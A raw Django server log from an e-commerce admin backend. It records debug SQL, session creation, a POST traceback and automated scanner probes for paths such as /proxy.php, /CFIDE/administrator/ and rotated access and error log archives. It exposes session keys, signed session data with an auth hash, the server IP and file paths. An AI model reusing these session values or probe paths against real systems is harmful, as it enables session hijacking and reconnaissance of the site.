2019-12-15 13:56:43,750 utils 20136 140506411554560 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5p1vqr0ys68evdn22lggflci7x2h65yz' LIMIT 1; args=('5p1vqr0ys68evdn22lggflci7x2h65yz',) DEBUG 2019-12-15 13:56:43,753 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5p1vqr0ys68evdn22lggflci7x2h65yz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-29T13:56:43.751628+00:00'::timestamptz); args=('5p1vqr0ys68evdn22lggflci7x2h65yz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 29, 13, 56, 43, 751628, tzinfo=)) [15/Dec/2019 13:56:43] "GET /login/?next=/ HTTP/1.0" 200 1786 [15/Dec/2019 13:59:09] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:05:02] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:18:55] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:23:58] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:31:52] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:36:55] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:41:58] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:48:20] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:53:22] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:57:15] "GET / HTTP/1.0" 302 0 [15/Dec/2019 14:58:24] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 15:04:21] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:09:49] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:18:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:23:09] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:33:07] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:38:10] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:46:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:53:35] "GET / HTTP/1.0" 302 0 [15/Dec/2019 15:58:38] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:14:04] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:25:14] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 16:30:16] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:35:19] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:41:42] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:46:45] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:51:48] "GET / HTTP/1.0" 302 0 [15/Dec/2019 16:56:50] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:11:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:18:09] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:23:12] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:28:14] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:33:17] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:39:28] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:44:31] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:50:43] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:52:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 17:59:53] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:05:02] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:10:18] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:15:20] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:20:23] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:25:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:30:29] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:39:41] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [15/Dec/2019 18:43:33] "GET /proxy.php HTTP/1.0" 404 6629 [15/Dec/2019 18:44:43] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:49:46] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:52:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:54:49] "GET / HTTP/1.0" 302 0 [15/Dec/2019 18:59:52] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:04:52] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:25:14] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:30:17] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:35:19] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:40:22] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:45:24] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:50:27] "GET / HTTP/1.0" 302 0 [15/Dec/2019 19:57:00] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [15/Dec/2019 20:15:32] "POST /editBlackAndWhiteList HTTP/1.0" 500 63820 [15/Dec/2019 20:18:32] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:23:35] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:28:38] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 20:33:41] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:42:21] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [15/Dec/2019 20:45:30] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [15/Dec/2019 20:45:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=116 HTTP/1.0" 404 6705 Not Found: /newslist.asp [15/Dec/2019 20:45:35] "GET /newslist.asp?type=4&id=1304 HTTP/1.0" 404 6649 [15/Dec/2019 20:47:24] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:52:26] "GET / HTTP/1.0" 302 0 [15/Dec/2019 20:57:29] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:03:59] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 21:12:18] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:12:28] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:17:21] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:26:50] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:31:53] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:36:56] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:41:58] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:47:01] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:52:04] "GET / HTTP/1.0" 302 0 [15/Dec/2019 21:57:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 Not Found: /error.log-20191123.gz [15/Dec/2019 22:10:41] "GET /error.log-20191123.gz HTTP/1.0" 404 6657 [15/Dec/2019 22:11:18] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:20:39] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:24:06] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:25:42] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:30:45] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [15/Dec/2019 22:35:29] "HEAD /robots.txt HTTP/1.0" 404 6627 [15/Dec/2019 22:35:47] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:40:50] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:45:53] "GET / HTTP/1.0" 302 0 Not Found: /external.php [15/Dec/2019 22:47:54] "GET /external.php HTTP/1.0" 404 6629 [15/Dec/2019 22:54:09] "GET / HTTP/1.0" 302 0 [15/Dec/2019 22:59:12] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:10:02] "GET /whm-server-status HTTP/1.0" 301 0 [15/Dec/2019 23:11:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-15 23:15:40,158 utils 20136 140506411554560 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'resfx'; args=('resfx',) Not Found: /resfx/ [15/Dec/2019 23:15:40] "GET /resfx/ HTTP/1.0" 404 1727 [15/Dec/2019 23:16:13] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:21:16] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:26:18] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:31:21] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:39:32] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:44:35] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [15/Dec/2019 23:53:33] "GET /proxy.php HTTP/1.0" 404 6629 [15/Dec/2019 23:54:32] "GET / HTTP/1.0" 302 0 [15/Dec/2019 23:55:02] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /access.log-20191125.gz [15/Dec/2019 23:58:08] "GET /access.log-20191125.gz HTTP/1.0" 404 6660 [15/Dec/2019 23:59:35] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [16/Dec/2019 00:04:54] "GET /robots.txt HTTP/1.0" 404 6623 [16/Dec/2019 00:04:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 00:04:55,311 utils 20136 140506411554560 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'aabkj0vepr8ycedux5004a9kuegiun4f' LIMIT 1; args=('aabkj0vepr8ycedux5004a9kuegiun4f',) DEBUG 2019-12-16 00:04:55,312 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('aabkj0vepr8ycedux5004a9kuegiun4f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T00:04:55.311644+00:00'::timestamptz); args=('aabkj0vepr8ycedux5004a9kuegiun4f', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 0, 4, 55, 311644, tzinfo=)) [16/Dec/2019 00:04:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 00:05:00] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [16/Dec/2019 00:05:01] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [16/Dec/2019 00:05:01] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [16/Dec/2019 00:05:01] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [16/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:10:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:20:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:25:13] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:31:37] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:38:41] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:47:29] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:52:31] "GET / HTTP/1.0" 302 0 [16/Dec/2019 00:57:34] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:09:23] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 01:09:23,480 utils 20136 140506411554560 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c7j7yky3216tmr94wwzz4e16np8383ji' LIMIT 1; args=('c7j7yky3216tmr94wwzz4e16np8383ji',) DEBUG 2019-12-16 01:09:23,481 utils 20136 140506411554560 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c7j7yky3216tmr94wwzz4e16np8383ji', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T01:09:23.480477+00:00'::timestamptz); args=('c7j7yky3216tmr94wwzz4e16np8383ji', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 1, 9, 23, 480477, tzinfo=)) [16/Dec/2019 01:09:23] "GET /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 01:09:23] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [16/Dec/2019 01:09:23] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [16/Dec/2019 01:09:23] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [16/Dec/2019 01:09:24] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [16/Dec/2019 01:09:24] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [16/Dec/2019 01:09:24] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [16/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:12:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:15:12] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:17:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:22:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:27:07] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:32:10] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:37:12] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:42:15] "GET / HTTP/1.0" 302 0 Not Found: /CFIDE/administrator/ [16/Dec/2019 01:44:05] "GET /CFIDE/administrator/ HTTP/1.0" 404 6653 [16/Dec/2019 01:47:17] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:52:20] "GET / HTTP/1.0" 302 0 [16/Dec/2019 01:59:43] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:05:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:20:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:25:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:27:26] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:34:41] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:37:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:42:13] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:47:15] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [16/Dec/2019 02:50:28] "GET /favicon.ico HTTP/1.0" 404 6627 [16/Dec/2019 02:52:45] "GET / HTTP/1.0" 302 0 [16/Dec/2019 02:57:47] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:14:36] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:19:39] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:27:30] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:32:32] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:37:35] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:42:37] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:43:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:47:40] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:52:43] "GET / HTTP/1.0" 302 0 [16/Dec/2019 03:57:45] "GET / HTTP/1.0" 302 0 Not Found: /access.log-20191126.gz [16/Dec/2019 04:02:37] "GET /access.log-20191126.gz HTTP/1.0" 404 6660 [16/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:07:07] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:10:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:20:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:25:23] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:30:26] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:35:29] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:40:31] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:41:56] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:45:34] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:50:37] "GET / HTTP/1.0" 302 0 [16/Dec/2019 04:55:39] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [16/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:20:10] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:29:41] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:34:44] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:39:47] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:44:50] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:46:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:49:53] "GET / HTTP/1.0" 302 0 [16/Dec/2019 05:54:56] "GET / HTTP/1.0" 302 0 Not Found: /access.log-20191124.gz [16/Dec/2019 05:57:03] "GET /access.log-20191124.gz HTTP/1.0" 404 6660 [16/Dec/2019 05:59:58] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [16/Dec/2019 06:00:14] "GET /index.asp HTTP/1.0" 404 6621 [16/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 06:10:46] "GET / HTTP/1.0" 302 0 Not Found: /error.log-20191126.gz [16/Dec/2019 06:14:30] "GET /error.log-20191126.gz HTTP/1.0" 404 6657 [16/Dec/2019 06:16:32] "GET / HTTP/1.0" 302 0 [16/Dec/2019 06:26:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 06:27:28,915 utils 20136 140506411554560 (0.012) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T06:27:28.888487+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 6, 27, 28, 888487, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 06:27:28,921 utils 20136 140506411554560 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-16 06:27:28,925 utils 20136 140506411554560 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-16 06:27:28,926 utils 20136 140506411554560 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-16 06:27:28,934 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() Not Found: /robots.txt [16/Dec/2019 06:27:28] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-16 06:27:29,153 utils 20136 140506411554560 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T06:27:29.150308+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 6, 27, 29, 150308, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 06:27:29] "GET /shop/category/ HTTP/1.0" 200 15719 [16/Dec/2019 06:27:29] "GET /static/admin/css/changelists.css HTTP/1.0" 304 0 [16/Dec/2019 06:27:29] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [16/Dec/2019 06:27:29] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [16/Dec/2019 06:27:29] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 DEBUG 2019-12-16 06:27:30,082 utils 20136 140506411554560 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T06:27:30.072814+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 6, 27, 30, 72814, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 06:27:30,085 utils 20136 140506411554560 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [16/Dec/2019 06:27:30] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:30] "GET /jsi18n/ HTTP/1.0" 200 3223 [16/Dec/2019 06:27:30] "GET /static/admin/js/jquery.init.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:30] "GET /static/admin/js/core.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:30] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:30] "GET /static/admin/js/actions.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:31] "GET /static/admin/js/urlify.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:31] "GET /static/admin/js/prepopulate.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:31] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 304 0 [16/Dec/2019 06:27:31] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 304 0 [16/Dec/2019 06:27:31] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 [16/Dec/2019 06:27:31] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [16/Dec/2019 06:27:31] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 Not Found: /favicon.ico [16/Dec/2019 06:27:32] "GET /favicon.ico HTTP/1.0" 404 6629 DEBUG 2019-12-16 06:27:33,661 utils 20136 140506411554560 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T06:27:33.651402+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 6, 27, 33, 651402, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 06:27:33,663 utils 20136 140506411554560 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-16 06:27:33,666 utils 20136 140506411554560 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-16 06:27:33,667 utils 20136 140506411554560 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-16 06:27:33,672 utils 20136 140506411554560 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-16 06:27:33,857 utils 20136 140506411554560 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T06:27:33.855301+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 6, 27, 33, 855301, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 06:27:33] "GET /shop/category/ HTTP/1.0" 200 15719 DEBUG 2019-12-16 06:27:34,288 utils 20136 140506411554560 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T06:27:34.277421+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 6, 27, 